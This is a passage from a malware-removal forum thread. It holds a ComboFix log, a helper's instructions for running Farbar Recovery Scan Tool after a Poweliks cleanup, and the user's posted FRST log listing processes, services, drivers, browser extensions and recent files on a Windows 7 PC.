S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
S3 usbfilter;AMD USB Filter Driver;c:\windows\system32\DRIVERS\usbfilter.sys;c:\windows\SYSNATIVE\DRIVERS\usbfilter.sys [x]
S3 VIAHdAudAddService;VIA High Definition Audio Driver Service;c:\windows\system32\drivers\viahduaa.sys;c:\windows\SYSNATIVE\drivers\viahduaa.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
Hpdevmgmt   REG_MULTI_SZ     hpqcxs08 hpqddsvc
.
Contents of the 'Scheduled Tasks' folder
.
2014-10-27 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-10-11 08:15]
.
2014-10-27 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2011-07-09 03:16]
.
2014-10-27 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2011-07-09 03:16]
.
.
--------- X64 Entries -----------
.
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = <local>
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\
FF - prefs.js: browser.startup.homepage - www.google.com
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
ShellIconOverlayIdentifiers-{472083B0-C522-11CF-8763-00608CC02F24} - (no file)
AddRemove-{1B9604EE-B104-45C8-8551-5F63BA631E23} - c:\programdata\{C6829A37-2437-4FB1-BA29-7FAAC442ACC3}\WeatherBugSetup.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-1721771813-3942891954-2793525010-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*f*l*›BU0\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1721771813-3942891954-2793525010-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*t*o*r*r*e*n*t*a*z*…Ãk[\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1721771813-3942891954-2793525010-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*Xr©Se*€ð*å]
@Class="Shell"
.
[HKEY_USERS\S-1-5-21-1721771813-3942891954-2793525010-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*Xr©Se*€ð*å\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_189_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_189_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_189_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_189_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_189.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.15"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_189.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_189.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_189.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-27 07:02:56
ComboFix-quarantined-files.txt 2014-10-27 14:02
ComboFix2.txt 2014-10-25 08:11
ComboFix3.txt 2014-10-25 07:48
ComboFix4.txt 2014-10-21 07:14
.
Pre-Run: 174,617,591,808 bytes free
Post-Run: 175,563,931,648 bytes free
.
- - End Of File - - 6EE6DFF8DC5BC62B2CED29491B0CA50E
4976D4A7A40B83FC7F06EE4BDD84EB9B

Naathim · October 27, 2014

Good, looks like we were able to finish Poweliks. Now let's make sure that everything is fine.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Make sure that Addition option is checked.
Press Scan button and wait.
The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

bmclain · October 27, 2014

It seems to have helped, but over the course of the last week I ran these tools on a couple different occasions, and both times it was better for a few hours, maybe even a day, but then started again.

Here are the logs:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-10-2014
Ran by McLain (administrator) on MCLAIN-PC on 27-10-2014 14:05:13
Running from C:\Users\McLain\Desktop
Loaded Profile: McLain (Available profiles: McLain)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
() C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\audiodg.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe [124720 2014-10-09] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [703736 2014-09-24] (Avira Operations GmbH & Co. KG)
Startup: C:\Users\LogMeInRemoteUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
DPF: HKLM {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://qtinstall.apple.com/qtactivex/qtplugin.cab
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101
FF NewTab: www.google.com
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll ()
FF Plugin: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll No File
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin-x32: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll No File
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Custom New Tab - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\CNT@ednovak.net.xpi [2013-07-18]
FF Extension: Magic Actions for YouTube™ - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\jid0-UVAeBCfd34Kk5usS8A1CBiobvM8@jetpack.xpi [2014-09-15]
FF Extension: NoScript - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2014-10-27]
FF Extension: Adblock Plus - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-10-27]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-10-23]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-27]
CHR Extension: (Google Drive) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-10-27]
CHR Extension: (YouTube) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-27]
CHR Extension: (Google Search) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-27]
CHR Extension: (Foxtab Speed Dial (Beta)) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj [2014-10-27]
CHR Extension: (Google Wallet) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-27]
CHR Extension: (Gmail) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-27]
CHR HKLM\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\McLain\AppData\Local\newhb.crx [2013-08-01]
CHR HKCU\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\McLain\AppData\Local\newhb.crx [2013-08-01]
CHR HKLM-x32\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\McLain\AppData\Local\newhb.crx [2013-08-01]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [431920 2014-09-24] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [431920 2014-09-24] (Avira Operations GmbH & Co. KG)
R2 ASUSWireless; C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe [184320 2012-03-21] () [File not signed]
R2 Avira.OE.ServiceHost; C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe [162096 2014-10-09] (Avira Operations GmbH & Co. KG)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
S4 jswpsapi; C:\Program Files (x86)\NETGEAR\WN111v2\jswpsapi.exe [942080 2008-02-29] (Atheros Communications, Inc.) [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
S4 RalinkRegistryWriter; C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\RaRegistry.exe [375872 2012-03-21] (Ralink Technology, Corp.)
S4 RealtekSE; C:\Program Files (x86)\ASUS\PCE-N10 WLAN Card Utilities\RtlService.exe [36864 2011-06-23] (Realtek) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2009-08-03] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [13368 2009-07-05] ()
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [119272 2014-09-24] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131608 2014-09-24] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2014-09-24] (Avira Operations GmbH & Co. KG)
S2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [53816 2009-02-10] (Samsung Electronics Co., Ltd.)
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-05-16] (GFI Software)
S3 Leapfrog-USBLAN; C:\Windows\System32\DRIVERS\btblan.sys [40320 2011-11-12] (Belcarra Technologies) [File not signed]
R3 MTsensor; C:\Windows\system32\DRIVERS\ASACPI.sys [15416 2009-07-15] ()
S3 PCAMp50a64; C:\Windows\System32\Drivers\PCAMp50a64.sys [43328 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 PCASp50a64; C:\Windows\System32\Drivers\PCASp50a64.sys [41280 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 Serial; C:\Windows\system32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R2 SSPORT; C:\Windows\SysWOW64\Drivers\SSPORT.sys [11576 2009-02-06] (Samsung Electronics)
S3 WN111v2; C:\Windows\System32\DRIVERS\WN111v2w7x.sys [767488 2009-10-21] (Atheros Communications, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-27 14:05 - 2014-10-27 14:05 - 00012465 _____ () C:\Users\McLain\Desktop\FRST.txt
2014-10-27 13:53 - 2014-10-27 13:53 - 00135230 _____ () C:\Windows\PFRO.log
2014-10-27 07:08 - 2014-10-27 07:08 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Avira
2014-10-27 07:08 - 2014-10-27 07:07 - 00043064 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2014-10-27 07:06 - 2014-09-24 12:44 - 00131608 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2014-10-27 07:06 - 2014-09-24 12:44 - 00119272 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2014-10-27 07:06 - 2014-09-24 12:44 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2014-10-27 07:05 - 2014-10-27 07:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2014-10-27 07:05 - 2014-10-27 07:06 - 00000000 ____D () C:\ProgramData\Avira
2014-10-27 07:05 - 2014-10-27 07:06 - 00000000 ____D () C:\Program Files (x86)\Avira
2014-10-27 07:05 - 2014-10-27 07:05 - 04585472 _____ (Avira Operations GmbH & Co. KG) C:\Users\McLain\Downloads\avira_en_av___ws.exe
2014-10-27 07:05 - 2014-10-27 07:05 - 00001137 _____ () C:\Users\Public\Desktop\Avira.lnk
2014-10-27 07:05 - 2014-10-27 07:05 - 00000000 ____D () C:\ProgramData\Package Cache
2014-10-27 07:02 - 2014-10-27 07:02 - 00019472 _____ () C:\ComboFix.txt
2014-10-27 06:47 - 2014-10-27 06:47 - 05591695 ____R (Swearware) C:\Users\McLain\Downloads\ComboFix.exe
2014-10-27 02:04 - 2014-10-27 02:04 - 02113024 _____ (Farbar) C:\Users\McLain\Desktop\FRST64.exe
2014-10-27 02:04 - 2014-10-27 02:04 - 00001071 _____ () C:\Users\McLain\Desktop\Malwarebytes scan.txt
2014-10-27 01:50 - 2014-10-27 13:53 - 00000168 _____ () C:\Windows\setupact.log
2014-10-27 01:50 - 2014-10-27 01:50 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 00:33 - 2014-10-27 14:05 - 00000000 ____D () C:\FRST
2014-10-26 22:39 - 2014-10-26 22:39 - 00000000 ____D () C:\ProgramData\CheckPoint
2014-10-25 10:22 - 2014-10-26 17:40 - 00000000 ____D () C:\Windows\Minidump
2014-10-25 01:53 - 2014-10-25 01:53 - 00000000 ____D () C:\ProgramData\Licenses
2014-10-25 01:47 - 2014-10-25 01:47 - 01700352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdiplus.dll
2014-10-25 01:47 - 2014-10-25 01:47 - 01060864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71.dll
2014-10-25 01:45 - 2014-10-27 00:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Comodo
2014-10-25 01:45 - 2014-10-26 14:11 - 00000000 ____D () C:\Program Files\COMODO
2014-10-25 01:45 - 2014-10-25 01:47 - 00000000 ____D () C:\Program Files (x86)\Comodo
2014-10-25 01:42 - 2014-10-26 14:11 - 00000000 ____D () C:\ProgramData\Comodo
2014-10-25 00:24 - 2014-10-25 00:24 - 00000000 ____D () C:\Windows\ERUNT
2014-10-24 04:06 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-24 03:48 - 2014-08-28 19:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-24 03:48 - 2014-05-08 02:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2014-10-24 03:42 - 2014-09-04 19:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-24 03:42 - 2014-09-04 18:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-24 00:06 - 2013-10-01 19:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2014-10-24 00:06 - 2013-10-01 19:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2014-10-24 00:06 - 2013-10-01 19:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2014-10-24 00:06 - 2013-10-01 18:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2014-10-24 00:06 - 2013-10-01 18:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2014-10-24 00:06 - 2013-10-01 18:29 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2014-10-24 00:06 - 2013-10-01 18:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2014-10-24 00:06 - 2013-10-01 17:15 - 01057280 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2014-10-24 00:06 - 2013-10-01 17:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
